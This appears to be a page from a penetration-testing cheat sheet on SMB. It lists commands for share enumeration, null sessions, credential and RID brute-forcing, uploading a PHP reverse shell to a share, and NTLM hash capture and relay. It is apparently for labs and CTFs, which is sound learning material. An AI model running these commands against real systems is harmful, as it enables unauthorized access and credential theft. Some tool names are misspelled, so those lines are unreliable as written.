🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 🚨Licence and Disclaimer
    • ⚡About Author
    • 📚Bookmarks
  • Fundamentals
    • Basic Commands
      • Linux
      • Git
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
    • Databases
      • MySQL
      • NoSQL
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • 💾Regex
    • Dorks
    • Python Essentials
    • Cryptography
    • Reverse Engineering
    • Tools
      • curl
      • Netcat
      • tcpdump
      • Nmap
      • ffuf
      • Gobuster
      • feroxbuster
      • SQLmap
      • 🦈Wireshark
      • Metasploit
      • GoWitness
      • Crunch
      • NetExec
  • Web Exploitation
    • Recon
    • Main Techniques
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Command Injection
      • SQLi
      • Arbitrary File Upload
      • SSTI
      • LFI
      • XSS
    • Web Servers
      • Apache
      • Nginx
    • Web Services
      • HashiCorp Vault
      • Laravel
      • Express
      • Magento
      • Tiny File Manager
      • Joomla
      • CMS Made Simple
      • Werkzeug
      • 🌵Cacti
      • Tomcat
      • Zabbix
      • OpenNetAdmin
      • Wordpress
      • Java-based web application
        • Struts
        • .WAR
        • JDWP
      • ImageMagick
  • Cloud Exploitation
    • Kubernetes
  • Post Exploitation
    • File Transfer
    • Credential Dumping
      • Thunderbird
    • Pivoting/Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Hijacks
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Escaping Docker
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
  • Enumeration
  • To download files type this sequence of commands:
Edit on GitHub
  1. Fundamentals
  2. Network Protocols

SMB

Server Message Block

Enumeration

Without Credentials

List Resource list
smbclient -L <IP>
List Null session
smbclient -N <IP>
Connect to share
smbclient -N \\\\IP\Share
List Resources list + Null session
smbclient -L \\10.10.10.123 -N
Upload PHP reverse shell
smbclient -N //10.10.10.123/Development -c 'put cmd.php tokyo.php'
Without Credentials
smbclient --no-pass //IP/<Share>
List Share
smbclient //IP/<SHARE> -U <USER>
Connect to Host
smbmap -H <IP>
Connect with credentials
smbmap -H <IP> -d <dns> -u '<user>' -p '<pass>'
List Share
smbmap -H <IP> -r <SHARE>
Connect to host
crackmapexec smb <IP>
List shares
crackmapexec smb <IP> -u '' -p '' --shares
Full Enumeration
crackmapexec smb <IP> -u <username> -p <password> --allinfo
Bruteforce credentials
cracmapexec smb <IP> -u usernames -p passwords
Brutefoce RID
crackmapexec smb <IP> -u <USER> -p <PASSWORD> --rid-brute
Deep Credential Bruteforce
crackmapexec smb <IP> -u usernames -p passwords --continue-on-success
RMU (Remote Management User)
crackmapexec winrm <IP> -u <USER> -p <PASSWORD>
Connect to server
impacket-smbclient <IP>/user:password@address
Download file
smbget -U <User> smb://IP/<SHARE_LOCATION> / --download
Select the module
use auxiliary/scanner/smb/smb_enumshares
Set target
set RHOSTS <target_ip>
Execute
run
nmap --script smb-enum-shares.nse -p445 10.10.10.123

To download files type this sequence of commands:

1

recurse

2

prompt

3

mget *

NTLM Relay Attacks

Capture the Hash
responder -I eth0 -dwv
Relay the hash
impacket-ntrlrelayx -tf target.txt -smb2support -c <payload>
PreviousHTTP/HTTPSNextSNMP

Last updated 3 months ago

🌐